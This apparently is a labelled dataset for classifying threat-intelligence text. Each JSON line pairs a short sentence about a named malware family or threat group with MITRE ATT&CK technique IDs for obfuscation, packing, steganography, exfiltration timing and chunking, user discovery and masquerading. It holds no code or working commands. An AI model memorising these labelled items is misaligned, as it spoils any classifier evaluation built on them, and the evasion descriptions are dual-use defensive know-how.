{"text1":"FatDuke has been packed with junk code and strings.","labels":"['T1027.001']"}
{"text1":"Gamaredon Group has obfuscated .NET executables by inserting junk code.","labels":"['T1027.001']"}
{"text1":"Gelsemium can use junk code to hide functions and evade detection.","labels":"['T1027.001']"}
{"text1":"Goopy has had null characters padded in its malicious DLL payload.","labels":"['T1027.001']"}
{"text1":"GrimAgent has the ability to add bytes to change the file hash.","labels":"['T1027.001']"}
{"text1":"Higaisa performed padding with null bytes before calculating its hash.","labels":"['T1027.001']"}
{"text1":"Javali can use large obfuscated libraries to hinder detection and analysis.","labels":"['T1027.001']"}
{"text1":"Leviathan has inserted garbage characters into code, presumably to avoid anti-virus detection.","labels":"['T1027.001']"}
{"text1":"Maze has inserted large blocks of junk code, including some components to decrypt strings and other important information for later in the encryption process.","labels":"['T1027.001']"}
{"text1":"Mustang Panda has used junk code within their DLL files to hinder analysis.","labels":"['T1027.001']"}
{"text1":"Patchwork apparently altered NDiskMonitor samples by adding four bytes of random letters in a likely attempt to change the file hashes.","labels":"['T1027.001', 'T1027.005']"}
{"text1":"TAINTEDSCRIBE can execute \"FileRecvWriteRand\" to append random bytes to the end of a file received from C2.","labels":"['T1027.001']"}
{"text1":"ZeroT has obfuscated DLLs and functions using dummy API calls inserted between real instructions.","labels":"['T1027.001']"}
{"text1":"A FinFisher variant uses a custom packer.","labels":"['T1027.002']"}
{"text1":"A Patchwork payload was packed with UPX.","labels":"['T1027.002']"}
{"text1":"A version of Daserf uses the MPRESS packer.","labels":"['T1027.002']"}
{"text1":"APT29 used UPX to pack files.","labels":"['T1027.002']"}
{"text1":"APT3 has been known to pack their tools.","labels":"['T1027.002']"}
{"text1":"APT38 has used several code packing methods such as Themida, Enigma, VMProtect, and Obsidium, to pack their implants.","labels":"['T1027.002']"}
{"text1":"APT39 has packed tools with UPX, and has repacked a modified version of Mimikatz to thwart anti-virus detection.","labels":"['T1027.002']"}
{"text1":"Anchor has come with a packed payload.","labels":"['T1027.002']"}
{"text1":"Aoqin Dragon has used the Themida packer to obfuscate malicious payloads.","labels":"['T1027.002']"}
{"text1":"Astaroth uses a software packer called Pe123\\RPolyCryptor.","labels":"['T1027.002']"}
{"text1":"Bisonal has used the MPRESS packer and similar tools for obfuscation.","labels":"['T1027.002']"}
{"text1":"CSPY Downloader has been packed with UPX.","labels":"['T1027.002']"}
{"text1":"China Chopper's client component is packed with UPX.","labels":"['T1027.002']"}
{"text1":"Clop has been packed to help avoid detection.","labels":"['T1027.002']"}
{"text1":"CostaBricks can implement a custom-built virtual machine mechanism to obfuscate its code.","labels":"['T1027.002']"}
{"text1":"DRATzarus's dropper can be packed with UPX.","labels":"['T1027.002']"}
{"text1":"DarkComet has the option to compress its payload using UPX or MPRESS.","labels":"['T1027.002']"}
{"text1":"Dok is packed with an UPX executable packer.","labels":"['T1027.002']"}
{"text1":"During Night Dragon, threat actors used software packing in its tools.","labels":"['T1027.002']"}
{"text1":"Dyre has been delivered with encrypted resources and must be unpacked for execution.","labels":"['T1027.002']"}
{"text1":"Egregor's payloads are custom-packed, archived and encrypted to prevent analysis.","labels":"['T1027.002']"}
{"text1":"Elderwood has packed malware payloads before delivery to victims.","labels":"['T1027.002']"}
{"text1":"FYAnti has used ConfuserEx to pack its .NET module.","labels":"['T1027.002']"}
{"text1":"FatDuke has been regularly repacked by its operators to create large binaries and evade detection.","labels":"['T1027.002']"}
{"text1":"For Operation Dust Storm, the threat actors used UPX to pack some payloads.","labels":"['T1027.002']"}
{"text1":"For Operation Spalax, the threat actors used a variety of packers, including CyaX, to obfuscate malicious executables.","labels":"['T1027.002']"}
{"text1":"GreyEnergy is packed for obfuscation.","labels":"['T1027.002']"}
{"text1":"H1N1 uses a custom packing algorithm.","labels":"['T1027.002']"}
{"text1":"Hildegard has packed ELF files into other binaries.","labels":"['T1027.002']"}
{"text1":"HotCroissant has used the open source UPX executable packer.","labels":"['T1027.002']"}
{"text1":"HyperBro has the ability to pack its payload.","labels":"['T1027.002']"}
{"text1":"Kimsuky has packed malware with UPX.","labels":"['T1027.002']"}
{"text1":"Lazarus Group has used Themida to pack malicious DLLs and other files.","labels":"['T1027.002']"}
{"text1":"LiteDuke has been packed with multiple layers of encryption.","labels":"['T1027.002']"}
{"text1":"Lokibot has used several packing methods for obfuscation.","labels":"['T1027.002']"}
{"text1":"Machete has been packed with NSIS.","labels":"['T1027.002']"}
{"text1":"Melcoz has been packed with VMProtect and Themida.","labels":"['T1027.002']"}
{"text1":"Metamorfo has used VMProtect to pack and protect files.","labels":"['T1027.002']"}
{"text1":"NETWIRE has used .NET packer tools to evade detection.","labels":"['T1027.002']"}
{"text1":"Night Dragon is known to use software packing in its tools.","labels":"['T1027.002']"}
{"text1":"OSX_OCEANLOTUS.D has a variant that is packed with UPX.","labels":"['T1027.002']"}
{"text1":"OopsIE uses the SmartAssembly obfuscator to pack an embedded .Net Framework assembly used for C2.","labels":"['T1027.002']"}
{"text1":"QakBot can encrypt and pack malicious payloads.","labels":"['T1027.002']"}
{"text1":"Raindrop used a custom packer for its Cobalt Strike payload, which was compressed using the LZMA algorithm.","labels":"['T1027.002']"}
{"text1":"Rocke's miner has created UPX-packed files in the Windows Start Menu Folder.","labels":"['T1027.002', 'T1547.001']"}
{"text1":"SDBbot has used a packed installer file.","labels":"['T1027.002']"}
{"text1":"Saint Bot has been packed using a dark market crypter.","labels":"['T1027.002']"}
{"text1":"Sandworm Team used UPX to pack a copy of Mimikatz.","labels":"['T1027.002']"}
{"text1":"SeaDuke has been packed with the UPX packer.","labels":"['T1027.002']"}
{"text1":"ShimRat's loader has been packed with the compressed ShimRat core DLL and the legitimate DLL for it to hijack.","labels":"['T1027.002']"}
{"text1":"Some S-Type samples have been packed with UPX.","labels":"['T1027.002']"}
{"text1":"Some ZeroT DLL files have been packed with UPX.","labels":"['T1027.002']"}
{"text1":"Spark has been packed with Enigma Protector to obfuscate its contents.","labels":"['T1027.002']"}
{"text1":"Squirrelwaffle has been packed with a custom packer to hide payloads.","labels":"['T1027.002']"}
{"text1":"TA505 has used UPX to obscure malicious code.","labels":"['T1027.002']"}
{"text1":"The White Company has obfuscated their payloads through packing.","labels":"['T1027.002']"}
{"text1":"Threat Group-3390 has packed malware and tools.","labels":"['T1027.002']"}
{"text1":"Tomiris has been packed with UPX.","labels":"['T1027.002']"}
{"text1":"Trojan.Karagany samples sometimes use common binary packers such as UPX and Aspack on top of a custom Delphi binary packer.","labels":"['T1027.002']"}
{"text1":"Versions of Babuk have been packed.","labels":"['T1027.002']"}
{"text1":"Zebrocy's Delphi variant was packed with UPX.","labels":"['T1027.002']"}
{"text1":"ABK can extract a malicious Portable Executable (PE) from a photo.","labels":"['T1027.003']"}
{"text1":"APT37 uses steganography to send images to users that are embedded with shellcode.","labels":"['T1027.003']"}
{"text1":"Andariel has hidden malicious executables within PNG files.","labels":"['T1027.003']"}
{"text1":"Avenger can extract backdoor malware from downloaded images.","labels":"['T1027.003']"}
{"text1":"BBK can extract a malicious Portable Executable (PE) from a photo.","labels":"['T1027.003']"}
{"text1":"BRONZE BUTLER has used steganography in multiple operations to conceal malicious payloads.","labels":"['T1027.003']"}
{"text1":"Bandook has used .PNG images within a zip file to build the executable.","labels":"['T1027.003']"}
{"text1":"Diavol has obfuscated its main code routines within bitmap images as part of its anti-analysis techniques.","labels":"['T1027.003']"}
{"text1":"Earth Lusca has used steganography to hide shellcode in a BMP image file.","labels":"['T1027.003']"}
{"text1":"For Operation Spalax, the threat actors used packers that read pixel data from images contained in PE files' resource sections and build the next layer of execution from the data.","labels":"['T1027.003']"}
{"text1":"IcedID has embedded binaries within RC4 encrypted .png files.","labels":"['T1027.003']"}
{"text1":"Invoke-PSImage can be used to embed a PowerShell script within the pixels of a PNG file.","labels":"['T1027.003']"}
{"text1":"Leviathan has used steganography to hide stolen data inside other files stored on Github.","labels":"['T1027.003']"}
{"text1":"LiteDuke has used image files to hide its loader component.","labels":"['T1027.003']"}
{"text1":"MuddyWater has stored obfuscated JavaScript code in an image file named temp.jpg.","labels":"['T1027.003']"}
{"text1":"ObliqueRAT can hide its payload in BMP images hosted on compromised websites.","labels":"['T1027.003']"}
{"text1":"ProLock can use .jpg and .bmp files to store its payload.","labels":"['T1027.003']"}
{"text1":"RDAT can also embed data within a BMP image prior to exfiltration.","labels":"['T1027.003']"}
{"text1":"Raindrop used steganography to locate the start of its encoded payload within legitimate 7-Zip code.","labels":"['T1027.003']"}
{"text1":"Ramsay has PE data embedded within JPEG files contained within Word documents.","labels":"['T1027.003']"}
{"text1":"RegDuke can hide data in images, including use of the Least Significant Bit (LSB).","labels":"['T1027.003']"}
{"text1":"build_downer can extract malware from a downloaded JPEG.","labels":"['T1027.003']"}
{"text1":"Cardinal RAT and its watchdog component are compiled and executed after being delivered to victims as embedded, uncompiled source code.","labels":"['T1027.004']"}
{"text1":"DarkWatchman has used the \"csc.exe\" tool to compile a C# executable.","labels":"['T1027.004']"}
{"text1":"Gamaredon Group has compiled the source code for a downloader directly on the infected system using the built-in \"Microsoft.CSharp.CSharpCodeProvider\" class.","labels":"['T1027.004']"}
{"text1":"Rocke has compiled malware, delivered to victims as .c files, with the GNU Compiler Collection (GCC).","labels":"['T1027.004']"}
{"text1":"njRAT has used AutoIt to compile the payload and main script into a single executable after delivery.","labels":"['T1027.004']"}
{"text1":"APT3 has been known to remove indicators of compromise from tools.","labels":"['T1027.005']"}
{"text1":"Analysis of Daserf has shown that it regularly undergoes technical improvements to evade anti-virus detection.","labels":"['T1027.005']"}
{"text1":"Cobalt Strike includes a capability to modify the \"beacon\" payload to eliminate known signatures or unpacking methods.","labels":"['T1027.005']"}
{"text1":"Deep Panda has updated and modified its malware, resulting in different hash values that evade detection.","labels":"['T1027.005']"}
{"text1":"During Operation Wocao, threat actors edited variable names within the Impacket suite to avoid automated detection.","labels":"['T1027.005']"}
{"text1":"GALLIUM ensured each payload had a unique hash, including by using different types of packers.","labels":"['T1027.005']"}
{"text1":"InvisiMole has undergone regular technical improvements in an attempt to evade detection.","labels":"['T1027.005']"}
{"text1":"OilRig has tested malware samples to determine AV detection and subsequently modified the samples to ensure AV evasion.","labels":"['T1027.005']"}
{"text1":"Penquin can remove strings from binaries.","labels":"['T1027.005']"}
{"text1":"PowerSploit's \"Find-AVSignature\" AntivirusBypass module can be used to locate single byte anti-virus signatures.","labels":"['T1027.005']"}
{"text1":"QakBot can make small changes to itself in order to change its checksum and hash value.","labels":"['T1027.005']"}
{"text1":"SUNBURST source code used generic variable names and pre-obfuscated strings, and was likely sanitized of developer comments before being added to SUNSPOT.","labels":"['T1027.005']"}
{"text1":"TEMP.Veles has modified files based on the open-source project cryptcat in an apparent attempt to decrease AV detection rates.","labels":"['T1027.005']"}
{"text1":"The author of GravityRAT submitted samples to VirusTotal for testing, showing that the author modified the code to try to hide the DDE object in a different part of the document.","labels":"['T1027.005']"}
{"text1":"Waterbear can scramble functions not to be executed again with random values.","labels":"['T1027.005']"}
{"text1":"APT29 has embedded an ISO file within an HTML attachment that contained JavaScript code to initiate malware execution.","labels":"['T1027.006']"}
{"text1":"EnvyScout contains JavaScript code that can extract an encoded blob from its HTML body and write it to disk.","labels":"['T1027.006']"}
{"text1":"Bazar can hash then resolve API calls at runtime.","labels":"['T1027.007']"}
{"text1":"Lazarus Group has used a custom hashing method to resolve APIs used in shellcode.","labels":"['T1027.007']"}
{"text1":"Pteranodon can use a dynamic Windows hashing algorithm to map API components.","labels":"['T1027.007']"}
{"text1":"macOS.OSAMiner has used run-only Applescripts, a compiled and stripped version of AppleScript, to remove human readable indicators to evade detection.","labels":"['T1027.008']"}
{"text1":"Invoke-PSImage can be used to embed payload data within a new image file.","labels":"['T1027.009']"}
{"text1":"macOS.OSAMiner has embedded Stripped Payloads within another run-only Stripped Payloads.","labels":"['T1027.009']"}
{"text1":"ADVSTORESHELL collects, compresses, encrypts, and exfiltrates data to the C2 server every 10 minutes.","labels":"['T1029']"}
{"text1":"Chrommme can set itself to sleep before requesting a new command from C2.","labels":"['T1029']"}
{"text1":"Cobalt Strike can set its Beacon payload to reach out to the C2 server on an arbitrary and random interval.","labels":"['T1029']"}
{"text1":"Flagpro has the ability to wait for a specified time interval between communicating with and executing commands from C2.","labels":"['T1029']"}
{"text1":"Higaisa sent the victim computer identifier in a User-Agent string back to the C2 server every 10 minutes.","labels":"['T1029']"}
{"text1":"LightNeuron can be configured to exfiltrate data during nighttime or working hours.","labels":"['T1029']"}
{"text1":"Machete sends stolen data to the C2 server every 10 minutes.","labels":"['T1029']"}
{"text1":"POWERSTATS can sleep for a given number of seconds.","labels":"['T1029']"}
{"text1":"ShadowPad has sent data back to C2 every 8 hours.","labels":"['T1029']"}
{"text1":"jRAT can be configured to reconnect at certain intervals.","labels":"['T1029']"}
{"text1":"APT28 has split archived exfiltration files into chunks smaller than 1MB.","labels":"['T1030']"}
{"text1":"AppleSeed has divided files if the size is 0x1000000 bytes or more.","labels":"['T1030']"}
{"text1":"Cobalt Strike will break large data sets into smaller chunks for exfiltration.","labels":"['T1030']"}
{"text1":"During C0015, the threat actors limited Rclone's bandwidth setting during exfiltration.","labels":"['T1030']"}
{"text1":"Helminth splits data into chunks up to 23 bytes and sends the data in DNS queries to its C2 server.","labels":"['T1030']"}
{"text1":"Kessel can split the data to be exilftrated into chunks that will fit in subdomains of DNS queries.","labels":"['T1030']"}
{"text1":"Kevin can exfiltrate data to the C2 server in 27-character chunks.","labels":"['T1030']"}
{"text1":"Mythic supports custom chunk sizes used to upload\/download files.","labels":"['T1030']"}
{"text1":"OopsIE exfiltrates command output and collected files to its C2 server in 1500-byte blocks.","labels":"['T1030']"}
{"text1":"POSHSPY uploads data in 2048-byte chunks.","labels":"['T1030']"}
{"text1":"The Rclone \"chunker\" overlay supports splitting large files in smaller chunks during upload to circumvent size limits.","labels":"['T1030']"}
{"text1":"A Gamaredon Group file stealer can gather the victim's username to send to a C2 server.","labels":"['T1033']"}
{"text1":"A Linux version of Derusbi checks if the victim user ID is anything other than zero (normally used for root), and the malware will not execute if it does not have root privileges. Derusbi also gathers the username of the victim.","labels":"['T1033']"}
{"text1":"A module in Prikormka collects information from the victim about the current user name.","labels":"['T1033']"}
{"text1":"APT32 collected the victim's username and executed the \"whoami\" command on the victim's machine. APT32 executed shellcode to collect the username on the victim's machine.","labels":"['T1033']"}
{"text1":"APT39 used Remexi to collect usernames from the system.","labels":"['T1033']"}
{"text1":"APT41 used the WMIEXEC utility to execute \"whoami\" commands on remote machines.","labels":"['T1033']"}
{"text1":"Action RAT has the ability to collect the username from an infected host.","labels":"['T1033']"}
{"text1":"Agent.btz obtains the victim username and saves it to a file.","labels":"['T1033']"}
{"text1":"Amadey has collected the user name from a compromised host using `GetUserNameA`.","labels":"['T1033']"}
{"text1":"An APT3 downloader uses the Windows command \"\"cmd.exe\" \/C whoami\" to verify that it is running with the elevated privileges of \u201cSystem.\u201d","labels":"['T1033']"}
{"text1":"Aria-body has the ability to identify the username on a compromised host.","labels":"['T1033']"}
{"text1":"AuTo Stealer has the ability to collect the username from an infected host.","labels":"['T1033']"}
{"text1":"Azorult can collect the username from the victim\u2019s machine.","labels":"['T1033']"}
{"text1":"BabyShark has executed the \"whoami\" command.","labels":"['T1033']"}
{"text1":"Backdoor.Oldrea collects the current username from the victim.","labels":"['T1033']"}
{"text1":"Bazar can identify the username of the infected user.","labels":"['T1033']"}
{"text1":"BloodHound can collect information on user sessions.","labels":"['T1033']"}
{"text1":"Bonadan has discovered the username of the user running the backdoor.","labels":"['T1033']"}
{"text1":"BoomBox can enumerate the username on a compromised host.","labels":"['T1033']"}
{"text1":"Cardinal RAT can collect the username from a victim machine.","labels":"['T1033']"}
{"text1":"Caterpillar WebShell can obtain a list of user accounts from a victim's machine.","labels":"['T1033']"}
{"text1":"Chaes has collected the username and UID from the infected machine.","labels":"['T1033']"}
{"text1":"Chimera has used the \"quser\" command to show currently logged on users.","labels":"['T1033']"}
{"text1":"Chrommme can retrieve the username from a targeted system.","labels":"['T1033']"}
{"text1":"Clambling can identify the username on a compromised host.","labels":"['T1033']"}
{"text1":"Crimson can identify the user on a targeted system.","labels":"['T1033']"}
{"text1":"DRATzarus can obtain a list of users from an infected machine.","labels":"['T1033']"}
{"text1":"DarkComet gathers the username from the victim\u2019s machine.","labels":"['T1033']"}
{"text1":"Diavol can collect the username from a compromised host.","labels":"['T1033']"}
{"text1":"DnsSystem can use the Windows user name to create a unique identification for infected users and systems.","labels":"['T1033']"}
{"text1":"DownPaper collects the victim username and sends it to the C2 server.","labels":"['T1033']"}
{"text1":"Dragonfly 2.0 used the command \"query user\" on victim hosts.","labels":"['T1033']"}
{"text1":"Dragonfly used the command \"query user\" on victim hosts.","labels":"['T1033']"}
{"text1":"During Frankenstein, the threat actors used Empire to enumerate hosts and gather username, machine name, and administrative permissions information.","labels":"['T1033']"}
{"text1":"During Night Dragon, threat actors used password cracking and pass-the-hash tools to discover usernames and passwords.","labels":"['T1033']"}
{"text1":"During Operation CuckooBees, the threat actors used the `query user` and `whoami` commands as part of their advanced reconnaissance.","labels":"['T1033']"}
{"text1":"During Operation Wocao, threat actors enumerated sessions and users on a remote host, and identified privileged users logged into a targeted system.","labels":"['T1033']"}
{"text1":"Dyre has the ability to identify the users on a compromised host.","labels":"['T1033']"}
{"text1":"EVILNUM can obtain the username from the victim's machine.","labels":"['T1033']"}
{"text1":"Earth Lusca collected information on user accounts via the \"whoami\" command.","labels":"['T1033']"}
{"text1":"Egregor has used tools to gather information about users.","labels":"['T1033']"}
{"text1":"Empire can enumerate the username on targeted hosts.","labels":"['T1033']"}
{"text1":"Epic collects the user name from the victim\u2019s machine.","labels":"['T1033']"}
{"text1":"FELIXROOT collects the username from the victim\u2019s machine.","labels":"['T1033']"}
{"text1":"FIN10 has used Meterpreter to enumerate users on remote systems.","labels":"['T1033']"}
{"text1":"Felismus collects the current username and sends it to the C2 server.","labels":"['T1033']"}
{"text1":"Flagpro has been used to run the \"whoami\" command on the system.","labels":"['T1033']"}
{"text1":"FlawedAmmyy enumerates the current user during the initial infection.","labels":"['T1033']"}
{"text1":"FunnyDream has the ability to gather user information from the targeted system using `whoami\/upn&whoami\/fqdn&whoami\/logonid&whoami\/all`.","labels":"['T1033']"}
{"text1":"GALLIUM used \"whoami\" and \"query user\" to obtain information about the victim user.","labels":"['T1033']"}
{"text1":"Gelsemium has the ability to distinguish between a standard user and an administrator on a compromised host.","labels":"['T1033']"}
{"text1":"Get2 has the ability to identify the current username of an infected host.","labels":"['T1033']"}
{"text1":"Gold Dragon collects the endpoint victim's username and uses it as a basis for downloading additional components from the C2 server.","labels":"['T1033']"}
{"text1":"GravityRAT collects the victim username along with other account information (account type, description, full name, SID and status).","labels":"['T1033']"}
{"text1":"HAWKBALL can collect the user name of the system.","labels":"['T1033']"}
{"text1":"HotCroissant has the ability to collect the username on the infected host.","labels":"['T1033']"}
{"text1":"KONNI can collect the username from the victim\u2019s machine.","labels":"['T1033']"}
{"text1":"Ke3chang has used implants capable of collecting the signed-in username.","labels":"['T1033']"}
{"text1":"Koadic can identify logged in users across the domain and views user sessions.","labels":"['T1033']"}
{"text1":"Kwampirs collects registered owner details by using the commands \"systeminfo\" and \"net config workstation\".","labels":"['T1033']"}
{"text1":"Linux Rabbit opens a socket on port 22 and if it receives a response it attempts to obtain the machine's hostname and Top-Level Domain.","labels":"['T1033']"}
{"text1":"LiteDuke can enumerate the account name on a targeted system.","labels":"['T1033']"}
{"text1":"Lizar can collect the username from the system.","labels":"['T1033']"}
{"text1":"MacMa can collect the username from the compromised machine.","labels":"['T1033']"}
{"text1":"MarkiRAT can retrieve the victim\u2019s username.","labels":"['T1033']"}
{"text1":"Micropsia collects the username from the victim\u2019s machine.","labels":"['T1033']"}
{"text1":"Milan can identify users registered to a targeted machine.","labels":"['T1033']"}
{"text1":"MirageFox can gather the username from the victim\u2019s machine.","labels":"['T1033']"}
{"text1":"Mis-Type runs tests to determine the privilege level of the compromised user.","labels":"['T1033']"}
{"text1":"More_eggs has the capability to gather the username from the victim's machine.","labels":"['T1033']"}
{"text1":"Mosquito runs \"whoami\" on the victim\u2019s machine.","labels":"['T1033']"}
{"text1":"NBTscan can list active users on the system.","labels":"['T1033']"}
{"text1":"NDiskMonitor obtains the victim username and encrypts the information to send over its C2 channel.","labels":"['T1033']"}
{"text1":"NOKKI can collect the username from the victim\u2019s machine.","labels":"['T1033']"}
{"text1":"NanHaiShu collects the username from the victim.","labels":"['T1033']"}
{"text1":"Neoichor can collect the user name from a victim's machine.","labels":"['T1033']"}
{"text1":"ObliqueRAT can check for blocklisted usernames on infected endpoints.","labels":"['T1033']"}
{"text1":"Octopus can collect the username from the victim\u2019s machine.","labels":"['T1033']"}
{"text1":"OilRig has run \"whoami\" on a victim.","labels":"['T1033']"}
{"text1":"Okrum can collect the victim username.","labels":"['T1033']"}
{"text1":"Operation Wocao has enumerated sessions and users on a remote host, and identified privileged users logged into a targeted system.","labels":"['T1033']"}
{"text1":"POWERSTATS has the ability to identify the username on the compromised host.","labels":"['T1033']"}
{"text1":"POWRUNER may collect information about the currently logged in user by running \"whoami\" on a victim.","labels":"['T1033']"}
{"text1":"Patchwork collected the victim username and whether it was running as admin, then sent the information to its C2 server.","labels":"['T1033']"}
{"text1":"PoetRAT sent username, computer name, and the previously generated UUID in reply to a \"who\" command from C2.","labels":"['T1033']"}
{"text1":"PowerShower has the ability to identify the current user on the infected host.","labels":"['T1033']"}
{"text1":"PyDCrypt has probed victim machines with \"whoami\" and has collected the username from the machine.","labels":"['T1033']"}
{"text1":"QUADAGENT gathers the victim username.","labels":"['T1033']"}
{"text1":"QakBot can identify the user name on a compromised system.","labels":"['T1033']"}
{"text1":"QuasarRAT can enumerate the username and account type.","labels":"['T1033']"}
{"text1":"RATANKBA runs the \"whoami\" and \"query user\" commands.","labels":"['T1033']"}
{"text1":"RCSession can gather system owner information, including user and administrator privileges.","labels":"['T1033']"}
{"text1":"RGDoor executes the \"whoami\" on the victim\u2019s machine.","labels":"['T1033']"}
{"text1":"ROKRAT can collect the username from a compromised host.","labels":"['T1033']"}
{"text1":"RTM can obtain the victim username and permissions.","labels":"['T1033']"}
{"text1":"RedLeaves can obtain information about the logged on user both locally and for Remote Desktop sessions.","labels":"['T1033']"}
{"text1":"Remsec can obtain information about the current user.","labels":"['T1033']"}
{"text1":"Revenge RAT gathers the username from the system.","labels":"['T1033']"}
{"text1":"Rifdoor has the ability to identify the username on the compromised host.","labels":"['T1033']"}
{"text1":"Rising Sun can detect the username of the infected host.","labels":"['T1033']"}
{"text1":"SDBbot has the ability to identify the user on a compromised host.","labels":"['T1033']"}
{"text1":"SLOTHFULMEDIA has collected the username from a victim machine.","labels":"['T1033']"}
{"text1":"SMOKEDHAM has used \"whoami\" commands to identify system owners.","labels":"['T1033']"}
{"text1":"STARWHALE can gather the username from an infected host.","labels":"['T1033']"}
{"text1":"SUNBURST collected the username from a compromised host.","labels":"['T1033']"}
{"text1":"ServHelper will attempt to enumerate the username of the victim.","labels":"['T1033']"}
{"text1":"SideTwist can collect the username on a targeted system.","labels":"['T1033']"}
{"text1":"Small Sieve can obtain the id of a logged in user.","labels":"['T1033']"}
{"text1":"SodaMaster can identify the username on a compromised host.","labels":"['T1033']"}
{"text1":"SombRAT can execute \"getinfo\"  to identify the username on a compromised host.","labels":"['T1033']"}
{"text1":"Squirrelwaffle can collect the user name from a compromised host.","labels":"['T1033']"}
{"text1":"SslMM sends the logged-on username to its hard-coded C2.","labels":"['T1033']"}
{"text1":"Stealth Falcon malware gathers the registered user and primary owner name via WMI.","labels":"['T1033']"}
{"text1":"StrifeWater can collect the user name from the victim's machine.","labels":"['T1033']"}
{"text1":"SynAck gathers user names from infected hosts.","labels":"['T1033']"}
{"text1":"T9000 gathers and beacons the username of the logged in account during installation. It will also gather the username of running processes to determine if it is running as SYSTEM.","labels":"['T1033']"}
{"text1":"The OsInfo function in Komplex collects the current running username.","labels":"['T1033']"}
{"text1":"TrickBot can identify the user and groups the user belongs to on a compromised host.","labels":"['T1033']"}
{"text1":"Trojan.Karagany can gather information about the user on a compromised host.","labels":"['T1033']"}
{"text1":"UPPERCUT has the capability to collect the current logged on user\u2019s username from a machine.","labels":"['T1033']"}
{"text1":"Valak can gather information regarding the user.","labels":"['T1033']"}
{"text1":"WINDSHIELD can gather the victim user name.","labels":"['T1033']"}
{"text1":"WINERACK can gather information on the victim username.","labels":"['T1033']"}
{"text1":"WellMail can identify the current username on the victim system.","labels":"['T1033']"}
{"text1":"WinMM uses NetUser-GetInfo to identify that it is running under an \u201cAdmin\u201d account on the local system.","labels":"['T1033']"}
{"text1":"Wizard Spider has used \"whoami\" to identify the local user and their privileges.","labels":"['T1033']"}
{"text1":"XAgentOSX contains the getInfoOSX function to return the OS X version as well as the current user.","labels":"['T1033']"}
{"text1":"ZIRCONIUM has used a tool to capture the username on a compromised host in order to register it with C2.","labels":"['T1033']"}
{"text1":"Zebrocy gets the username from the system.","labels":"['T1033']"}
{"text1":"ZxxZ can collect the username from a compromised host.","labels":"['T1033']"}
{"text1":"njRAT enumerates the current user during the initial infection.","labels":"['T1033']"}
{"text1":"zwShell can obtain the name of the logged-in user on the victim.","labels":"['T1033']"}
{"text1":"APT28 has renamed the WinRAR utility to avoid detection.","labels":"['T1036']"}
{"text1":"AppleSeed can disguise JavaScript files as PDFs.","labels":"['T1036']"}
{"text1":"Bisonal dropped a decoy payload with a .jpg extension that contained a malicious Visual Basic script.","labels":"['T1036']"}
{"text1":"BoomBox has the ability to mask malicious data strings as PDF files.","labels":"['T1036']"}
{"text1":"Dragonfly 2.0 created accounts disguised as legitimate backup and service accounts as well as an email administration account.","labels":"['T1036']"}
{"text1":"Dragonfly has created accounts disguised as legitimate backup and service accounts as well as an email administration account.","labels":"['T1036']"}
{"text1":"EnvyScout has used folder icons for malicious files to lure victims into opening them.","labels":"['T1036']"}
{"text1":"Flagpro can download malicious files with a .tmp extension and append them with .exe prior to execution.","labels":"['T1036']"}
{"text1":"For Operation Dust Storm, the threat actors disguised some executables as JPG files.","labels":"['T1036']"}
{"text1":"Kimsuky has disguised its C2 addresses as the websites of shopping malls, governments, universities, and others.","labels":"['T1036']"}
{"text1":"Lazarus Group has disguised malicious template files as JPEG files to avoid detection.","labels":"['T1036']"}
{"text1":"LazyScripter has used several different security software icons to disguise executables.","labels":"['T1036']"}
{"text1":"Milan has used an executable named `companycatalogue` to appear benign.","labels":"['T1036']"}
{"text1":"Mustang Panda has used an additional filename extension to hide the true file type.","labels":"['T1036', 'T1036.007']"}
{"text1":"NativeZone has, upon execution, displayed a message box that appears to be related to a Ukrainian electronic document management system.","labels":"['T1036']"}
{"text1":"Nomadic Octopus attempted to make Octopus appear as a  Telegram Messenger with a Russian interface.","labels":"['T1036']"}
{"text1":"NotPetya drops PsExec with the filename dllhost.dat.","labels":"['T1036']"}
{"text1":"PLATINUM has renamed rar.exe to avoid detection.","labels":"['T1036']"}
{"text1":"PowGoop has disguised a PowerShell script as a .dat file (goopdate.dat).","labels":"['T1036']"}
{"text1":"QuasarRAT has dropped binaries as files named microsoft_network.exe and crome.exe.","labels":"['T1036']"}
{"text1":"RCSession has used a file named English.rtf to appear benign on victim hosts.","labels":"['T1036']"}
{"text1":"Raindrop was built to include a modified version of 7-Zip source code (including associated export names) and Far Manager source code.","labels":"['T1036']"}
{"text1":"Ryuk can create .dll files that actually contain a Rich Text File format document.","labels":"['T1036']"}
{"text1":"Saint Bot has renamed malicious binaries as `wallpaper.mp4` and `slideshow.mp4` to avoid detection.","labels":"['T1036']"}
{"text1":"SombRAT can use a legitimate process name to hide itself.","labels":"['T1036']"}
{"text1":"The QakBot payload has been disguised as a PNG file.","labels":"['T1036']"}
{"text1":"TrailBlazer has used filenames that match the name of the compromised system in attempt to avoid detection.","labels":"['T1036']"}
{"text1":"UNC2452 set the hostnames of its C2 infrastructure to match legitimate hostnames in the victim environment. They also primarily used IP addresses originating from the same country as the victim for their VPN infrastructure.","labels":"['T1036']"}
{"text1":"WhisperGate has been disguised as a JPG extension to avoid detection as a malicious PE file.","labels":"['T1036']"}
{"text1":"XCSSET builds a malicious application bundle to resemble Safari through using the Safari icon and \"Info.plist\".","labels":"['T1036']"}
{"text1":"menuPass has used esentutl to change file extensions to their true type that were masquerading as .txt files.","labels":"['T1036']"}
{"text1":"APT37 has signed its malware with an invalid digital certificates listed as \u201cTencent Technology (Shenzhen) Company Limited.\u201d","labels":"['T1036.001']"}
{"text1":"BADNEWS is sometimes signed with an invalid Authenticode certificate in an apparent effort to make it look more legitimate.","labels":"['T1036.001']"}
{"text1":"Gelsemium has used unverified signatures on malicious DLLs.","labels":"['T1036.001']"}
{"text1":"PcShare has used an invalid certificate in attempt to appear legitimate.","labels":"['T1036.001']"}
{"text1":"WindTail has been incompletely signed with revoked certificates.","labels":"['T1036.001']"}
{"text1":"Windshift has used revoked certificates to sign malware.","labels":"['T1036.001']"}
{"text1":"BlackTech has used right-to-left-override to obfuscate the filenames of malicious e-mail attachments.","labels":"['T1036.002']"}
{"text1":"Ferocious Kitten has used right-to-left override to reverse executables\u2019 names to make them appear to have different file extensions, rather than their real ones.","labels":"['T1036.002']"}
{"text1":"Ke3chang has used the right-to-left override character in spearphishing attachment names to trick targets into executing .scr and .exe files.","labels":"['T1036.002']"}
{"text1":"Scarlet Mimic has used the left-to-right override character in self-extracting RAR archive spearphishing attachment file names.","labels":"['T1036.002']"}
{"text1":"APT32 has moved and renamed pubprn.vbs to a .txt file to avoid detection.","labels":"['T1036.003']"}
{"text1":"Kevin has renamed an image of `cmd.exe` with a random name followed by a `.tmpl` extension.","labels":"['T1036.003']"}
